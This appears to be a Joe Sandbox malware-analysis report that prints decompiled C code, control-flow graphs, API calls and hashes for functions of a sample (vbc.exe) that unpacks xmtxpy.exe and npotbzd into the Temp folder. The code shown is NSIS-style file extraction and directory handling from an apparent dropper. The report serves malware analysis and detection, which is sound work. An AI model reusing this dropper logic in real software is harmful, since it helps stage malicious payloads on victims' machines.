                          • Opcode ID: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction ID: 3eb6007c32f8468fb795c2e80af6b0be0f5756db52a0f0690052116b0cd8de19
                          • Opcode Fuzzy Hash: 23dbf256a431c673dcec6fcfeb39f26d17845bcd57e0c5f68381439a59f6d1b4
                          • Instruction Fuzzy Hash: 5B61E231A40204ABDB219F64DE89B9A7BB8AF04315F10417BF905B72D1D7BC9E858B9C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401734 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147stringtimeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 418 401734-401757 call 4029e8 call 4055e5 423 401761-401773 call 405a85 call 405578 lstrcatA 418->423 424 401759-40175f call 405a85 418->424 429 401778-40177e call 405ce3 423->429 424->429 434 401783-401787 429->434 435 401789-401793 call 405d7c 434->435 436 4017ba-4017bd 434->436 443 4017a5-4017b7 435->443 444 401795-4017a3 CompareFileTime 435->444 437 4017c5-4017e1 call 40575c 436->437 438 4017bf-4017c0 call 40573d 436->438 446 4017e3-4017e6 437->446 447 401859-401882 call 404e23 call 402f01 437->447 438->437 443->436 444->443 448 4017e8-40182a call 405a85 * 2 call 405aa7 call 405a85 call 405346 446->448 449 40183b-401845 call 404e23 446->449 459 401884-401888 447->459 460 40188a-401896 SetFileTime 447->460 448->434 482 401830-401831 448->482 461 40184e-401854 449->461 459->460 463 40189c-4018a7 CloseHandle 459->463 460->463 464 402886 461->464 467 40287d-402880 463->467 468 4018ad-4018b0 463->468 466 402888-40288c 464->466 467->464 471 4018b2-4018c3 call 405aa7 lstrcatA 468->471 472 4018c5-4018c8 call 405aa7 468->472 478 4018cd-402205 call 405346 471->478 472->478 478->466 485 40264e-402655 478->485 482->461 484 401833-401834 482->484 484->449 485->467
                          C-Code - Quality: 75%
                          			E00401734(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E004029E8(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004055E5(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405578(E00405A85(0x409b68, "C:\\Users\\Albus\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409b68);
					E00405A85();
				}
				E00405CE3(0x409b68);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405D7C(0x409b68);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040573D(0x409b68);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040575C(0x409b68, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404E23(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x423f28;
						goto L32;
					} else {
						E00405A85(0x40a368, 0x424000);
						E00405A85(0x424000, 0x409b68);
						E00405AA7(_t75, 0x40a368, 0x409b68, 0x409f68,  *((intOrPtr*)(_t85 - 0x10)));
						E00405A85(0x424000, 0x40a368);
						_t62 = E00405346(0x409f68,  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409b68);
								_push(0xfffffffa);
								E00404E23();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404E23(0xffffffea,  *(_t85 - 8));
				 *0x423f54 =  *0x423f54 + 1;
				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
				 *0x423f54 =  *0x423f54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
					} else {
						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
						lstrcatA(0x409b68,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409b68);
					E00405346();
					goto L29;
				}
				goto L33;
			}
















                          0x00401734
                          0x0040173b
                          0x00401744
                          0x00401747
                          0x0040174a
                          0x0040174f
                          0x00401757
                          0x00401773
                          0x00401759
                          0x00401759
                          0x0040175a
                          0x0040175a
                          0x00401779
                          0x00401783
                          0x00401783
                          0x00401787
                          0x0040178a
                          0x0040178f
                          0x00401791
                          0x00401793
                          0x00401798
                          0x00401798
                          0x004017a3
                          0x004017a3
                          0x004017b4
                          0x004017b6
                          0x004017b6
                          0x004017b7
                          0x004017b7
                          0x004017ba
                          0x004017bd
                          0x004017c0
                          0x004017c0
                          0x004017c7
                          0x004017d6
                          0x004017db
                          0x004017de
                          0x004017e1
                          0x00000000
                          0x00000000
                          0x004017e3
                          0x004017e6
                          0x00401840
                          0x00401845
                          0x004015a8
                          0x0040264e
                          0x0040264e
                          0x0040287d
                          0x00402880
                          0x00402880
                          0x00000000
                          0x004017e8
                          0x004017ee
                          0x004017f9
                          0x00401806
                          0x00401811
                          0x00401827
                          0x00401827
                          0x0040182a
                          0x00000000
                          0x00401830
                          0x00401830
                          0x00401831
                          0x0040184e
                          0x00402886
                          0x00402886
                          0x00402886
                          0x00401833
                          0x00401833
                          0x00401834
                          0x00401492
                          0x00402200
                          0x00402200
                          0x00402200
                          0x00401831
                          0x0040182a
                          0x00402888
                          0x0040288c
                          0x0040288c
                          0x0040185e
                          0x00401863
                          0x00401871
                          0x00401876
                          0x0040187c
                          0x00401880
                          0x00401882
                          0x0040188a
                          0x00401896
                          0x00401884
                          0x00401884
                          0x00401888
                          0x00000000
                          0x00000000
                          0x00401888
                          0x0040189f
                          0x004018a5
                          0x004018a7
                          0x00000000
                          0x004018ad
                          0x004018ad
                          0x004018b0
                          0x004018c8
                          0x004018b2
                          0x004018b5
                          0x004018be
                          0x004018be
                          0x004018cd
                          0x004018d2
                          0x004021fb
                          0x00000000
                          0x004021fb
                          0x00000000

                          APIs
                          • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                          • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,00000000,00000000,C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                            • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,fwwmjbqpxzax Setup,NSIS Error), ref: 00405A92
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                          • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\xmtxpy.exe C:\Users\user\AppData\Local\Temp\npotbzd
                          • API String ID: 1941528284-1376950140
                          • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                          • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                          • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402F01 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 486 402f01-402f10 487 402f12-402f28 SetFilePointer 486->487 488 402f2e-402f39 call 40302c 486->488 487->488 491 403025-403029 488->491 492 402f3f-402f59 ReadFile 488->492 493 403022 492->493 494 402f5f-402f62 492->494 496 403024 493->496 494->493 495 402f68-402f7b call 40302c 494->495 495->491 499 402f81-402f84 495->499 496->491 500 402ff1-402ff7 499->500 501 402f86-402f89 499->501 502 402ff9 500->502 503 402ffc-40300f ReadFile 500->503 504 40301d-403020 501->504 505 402f8f 501->505 502->503 503->493 506 403011-40301a 503->506 504->491 507 402f94-402f9c 505->507 506->504 508 402fa1-402fb3 ReadFile 507->508 509 402f9e 507->509 508->493 510 402fb5-402fb8 508->510 509->508 510->493 511 402fba-402fcf WriteFile 510->511 512 402fd1-402fd4 511->512 513 402fed-402fef 511->513 512->513 514 402fd6-402fe9 512->514 513->496 514->507 515 402feb 514->515 515->504
                          C-Code - Quality: 93%
                          			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
				long _v8;
				intOrPtr _v12;
				void _t31;
				intOrPtr _t32;
				int _t35;
				long _t36;
				int _t37;
				long _t38;
				int _t40;
				int _t42;
				long _t43;
				long _t44;
				intOrPtr _t51;
				long _t55;
				long _t57;

				_t31 = _a4;
				if(_t31 >= 0) {
					_t51 =  *0x423ef8; // 0x135a
					_t44 = _t31 + _t51;
					 *0x41703c = _t44;
					SetFilePointer( *0x409014, _t44, 0, 0); // executed
				}
				_t57 = 4;
				_t32 = E0040302C(_t57);
				if(_t32 >= 0) {
					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
					if(_t35 == 0 || _v8 != _t57) {
						L23:
						_push(0xfffffffd);
						goto L24;
					} else {
						 *0x41703c =  *0x41703c + _t57;
						_t32 = E0040302C(_a4);
						_v12 = _t32;
						if(_t32 >= 0) {
							if(_a12 != 0) {
								_t36 = _a4;
								if(_t36 >= _a16) {
									_t36 = _a16;
								}
								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
								if(_t37 == 0) {
									goto L23;
								} else {
									_t38 = _v8;
									 *0x41703c =  *0x41703c + _t38;
									_v12 = _t38;
									goto L22;
								}
							} else {
								if(_a4 <= 0) {
									L22:
									_t32 = _v12;
								} else {
									while(1) {
										_t55 = 0x4000;
										if(_a4 < 0x4000) {
											_t55 = _a4;
										}
										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
										if(_t40 == 0 || _t55 != _v8) {
											goto L23;
										}
										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
										if(_t42 == 0 || _a16 != _t55) {
											_push(0xfffffffe);
											L24:
											_pop(_t32);
										} else {
											_t43 = _v8;
											_v12 = _v12 + _t43;
											_a4 = _a4 - _t43;
											 *0x41703c =  *0x41703c + _t43;
											if(_a4 > 0) {
												continue;
											} else {
												goto L22;
											}
										}
										goto L25;
									}
									goto L23;
								}
							}
						}
					}
				}
				L25:
				return _t32;
			}


















                          0x00402f06
                          0x00402f10
                          0x00402f12
                          0x00402f19
                          0x00402f1d
                          0x00402f28
                          0x00402f28
                          0x00402f30
                          0x00402f32
                          0x00402f39
                          0x00402f55
                          0x00402f59
                          0x00403022
                          0x00403022
                          0x00000000
                          0x00402f68
                          0x00402f6b
                          0x00402f71
                          0x00402f78
                          0x00402f7b
                          0x00402f84
                          0x00402ff1
                          0x00402ff7
                          0x00402ff9
                          0x00402ff9
                          0x0040300b
                          0x0040300f
                          0x00000000
                          0x00403011
                          0x00403011
                          0x00403014
                          0x0040301a
                          0x00000000
                          0x0040301a
                          0x00402f86
                          0x00402f89
                          0x0040301d
                          0x0040301d
                          0x00402f8f
                          0x00402f94
                          0x00402f94
                          0x00402f9c
                          0x00402f9e
                          0x00402f9e
                          0x00402faf
                          0x00402fb3
                          0x00000000
                          0x00000000
                          0x00402fc7
                          0x00402fcf
                          0x00402fed
                          0x00403024
                          0x00403024
                          0x00402fd6
                          0x00402fd6
                          0x00402fd9
                          0x00402fdc
                          0x00402fdf
                          0x00402fe9
                          0x00000000
                          0x00402feb
                          0x00000000
                          0x00402feb
                          0x00402fe9
                          0x00000000
                          0x00402fcf
                          0x00000000
                          0x00402f94
                          0x00402f89
                          0x00402f84
                          0x00402f7b
                          0x00402f59
                          0x00403025
                          0x00403029

                          APIs
                          • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,00007DE4), ref: 00402F28
                          • ReadFile.KERNELBASE(00409128,00000004,00007DE4,00000000,00000004), ref: 00402F55
                          • ReadFile.KERNELBASE(00413038,00004000,00007DE4,00000000,00409128), ref: 00402FAF
                          • WriteFile.KERNELBASE(00000000,00413038,00007DE4,000000FF,00000000), ref: 00402FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$Read$PointerWrite
                          • String ID: 80A
                          • API String ID: 2113905535-195308239
                          • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                          • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                          • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040302C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108fileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 516 40302c-403055 GetTickCount 517 403196-40319e call 402bc5 516->517 518 40305b-403086 call 4031da SetFilePointer 516->518 523 4031a0-4031a5 517->523 524 40308b-40309d 518->524 525 4030a1-4030af call 4031a8 524->525 526 40309f 524->526 529 4030b5-4030c1 525->529 530 403188-40318b 525->530 526->525 531 4030c7-4030cd 529->531 530->523 532 4030f8-403114 call 405e9d 531->532 533 4030cf-4030d5 531->533 539 403191 532->539 540 403116-40311e 532->540 533->532 534 4030d7-4030f7 call 402bc5 533->534 534->532 541 403193-403194 539->541 542 403120-403136 WriteFile 540->542 543 403152-403158 540->543 541->523 545 403138-40313c 542->545 546 40318d-40318f 542->546 543->539 544 40315a-40315c 543->544 544->539 547 40315e-403171 544->547 545->546 548 40313e-40314a 545->548 546->541 547->524 549 403177-403186 SetFilePointer 547->549 548->531 550 403150 548->550 549->517 550->547
                          C-Code - Quality: 93%
                          			E0040302C(intOrPtr _a4) {
				long _v4;
				void* __ecx;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t16;
				void* _t17;
				long _t18;
				int _t21;
				intOrPtr _t22;
				intOrPtr _t34;
				long _t35;
				intOrPtr _t37;
				long _t40;
				intOrPtr _t46;
				intOrPtr _t47;

				_t35 =  *0x41703c; // 0x56a38
				_t37 = _t35 -  *0x40afa8 + _a4;
				 *0x423eac = GetTickCount() + 0x1f4;
				if(_t37 <= 0) {
					L23:
					E00402BC5(1);
					return 0;
				}
				E004031DA( *0x41f04c);
				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
				 *0x41f048 = _t37;
				 *0x417038 = 0;
				while(1) {
					L2:
					_t12 =  *0x417040; // 0x480d0
					_t34 = 0x4000;
					_t13 = _t12 -  *0x41f04c;
					if(_t13 <= 0x4000) {
						_t34 = _t13;
					}
					_t14 = E004031A8(0x413038, _t34); // executed
					if(_t14 == 0) {
						break;
					}
					 *0x41f04c =  *0x41f04c + _t34;
					 *0x40afc8 = 0x413038;
					 *0x40afcc = _t34;
					while(1) {
						_t46 =  *0x423eb0; // 0x8c0fa0
						if(_t46 != 0) {
							_t47 =  *0x423f40; // 0x0
							if(_t47 == 0) {
								_t22 =  *0x41f048; // 0x19be0
								 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
								E00402BC5(0);
							}
						}
						 *0x40afd0 = 0x40b038;
						 *0x40afd4 = 0x8000; // executed
						_t16 = E00405E9D(0x40afb0); // executed
						if(_t16 < 0) {
							break;
						}
						_t40 =  *0x40afd0 - 0x40b038;
						if(_t40 == 0) {
							if( *0x40afcc != 0 || _t34 == 0) {
								break;
							} else {
								L17:
								_t18 =  *0x41703c; // 0x56a38
								if(_t18 -  *0x40afa8 + _a4 > 0) {
									goto L2;
								}
								SetFilePointer( *0x409014, _t18, 0, 0);
								goto L23;
							}
						}
						_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
						if(_t21 == 0 || _t40 != _v4) {
							_push(0xfffffffe);
							L22:
							_pop(_t17);
							return _t17;
						} else {
							 *0x40afa8 =  *0x40afa8 + _t40;
							if( *0x40afcc != 0) {
								continue;
							}
							goto L17;
						}
					}
					_push(0xfffffffd);
					goto L22;
				}
				return _t14 | 0xffffffff;
			}



















                          0x00403030
                          0x0040303d
                          0x00403050
                          0x00403055
                          0x00403196
                          0x00403198
                          0x00000000
                          0x0040319e
                          0x00403061
                          0x00403074
                          0x0040307a
                          0x00403080
                          0x0040308b
                          0x0040308b
                          0x0040308b
                          0x00403090
                          0x00403095
                          0x0040309d
                          0x0040309f
                          0x0040309f
                          0x004030a8
                          0x004030af
                          0x00000000
                          0x00000000
                          0x004030b5
                          0x004030bb
                          0x004030c1
                          0x004030c7
                          0x004030c7
                          0x004030cd
                          0x004030cf
                          0x004030d5
                          0x004030d7
                          0x004030ed
                          0x004030f2
                          0x004030f7
                          0x004030d5
                          0x004030fd
                          0x00403103
                          0x0040310d
                          0x00403114
                          0x00000000
                          0x00000000
                          0x0040311c
                          0x0040311e
                          0x00403158
                          0x00000000
                          0x0040315e
                          0x0040315e
                          0x0040315e
                          0x00403171
                          0x00000000
                          0x00000000
                          0x00403180
                          0x00000000
                          0x00403180
                          0x00403158
                          0x0040312e
                          0x00403136
                          0x0040318d
                          0x00403193
                          0x00403193
                          0x00000000
                          0x0040313e
                          0x0040313e
                          0x0040314a
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00403150
                          0x00403136
                          0x00403191
                          0x00000000
                          0x00403191
                          0x00000000

                          APIs
                          • GetTickCount.KERNEL32(00000000,00000004,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403041
                            • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                          • WriteFile.KERNELBASE(0040B038,?,00000000,00000000,00413038), ref: 0040312E
                          • SetFilePointer.KERNEL32(00056A38,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: File$Pointer$CountTickWrite
                          • String ID: 80A
                          • API String ID: 2146148272-195308239
                          • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                          • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                          • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 551 4015b3-4015c6 call 4029e8 call 40560c 556 4015c8-4015e3 call 4055a3 CreateDirectoryA 551->556 557 40160a-40160d 551->557 565 401600-401608 556->565 566 4015e5-4015f0 GetLastError 556->566 558 40162d-40215b call 401423 557->558 559 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 557->559 572 40287d-40288c 558->572 559->572 565->556 565->557 569 4015f2-4015fb GetFileAttributesA 566->569 570 4015fd 566->570 569->565 569->570 570->565
                          C-Code - Quality: 85%
                          			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
				struct _SECURITY_ATTRIBUTES** _t10;
				int _t19;
				struct _SECURITY_ATTRIBUTES* _t20;
				signed char _t22;
				struct _SECURITY_ATTRIBUTES* _t23;
				CHAR* _t25;
				struct _SECURITY_ATTRIBUTES** _t29;
				void* _t30;

				_t23 = __ebx;
				_t25 = E004029E8(0xfffffff0);
				_t10 = E0040560C(_t25);
				_t27 = _t10;
				if(_t10 != __ebx) {
					do {
						_t29 = E004055A3(_t27, 0x5c);
						 *_t29 = _t23;
						 *((char*)(_t30 + 0xb)) =  *_t29;
						_t19 = CreateDirectoryA(_t25, _t23); // executed
						if(_t19 == 0) {
							if(GetLastError() != 0xb7) {
								L4:
								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
							} else {
								_t22 = GetFileAttributesA(_t25); // executed
								if((_t22 & 0x00000010) == 0) {
									goto L4;
								}
							}
						}
						_t20 =  *((intOrPtr*)(_t30 + 0xb));
						 *_t29 = _t20;
						_t27 =  &(_t29[0]);
					} while (_t20 != _t23);
				}
				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405A85("C:\\Users\\Albus\\AppData\\Local\\Temp", _t25);
					SetCurrentDirectoryA(_t25); // executed
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}











                          0x004015b3
                          0x004015ba
                          0x004015bd
                          0x004015c2
                          0x004015c6
                          0x004015c8
                          0x004015d0
                          0x004015d6
                          0x004015d8
                          0x004015db
                          0x004015e3
                          0x004015f0
                          0x004015fd
                          0x004015fd
                          0x004015f2
                          0x004015f3
                          0x004015fb
                          0x00000000
                          0x00000000
                          0x004015fb
                          0x004015f0
                          0x00401600
                          0x00401603
                          0x00401605
                          0x00401606
                          0x004015c8
                          0x0040160d
                          0x0040162d
                          0x00402156
                          0x0040160f
                          0x00401611
                          0x0040161c
                          0x00401622
                          0x00401622
                          0x00402880
                          0x0040288c

                          APIs
                            • Part of subcall function 0040560C: CharNextA.USER32(004053BE), ref: 0040561A
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                            • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                          Strings
                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                          • String ID: C:\Users\user\AppData\Local\Temp
                          • API String ID: 3751793516-2935972921
                          • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
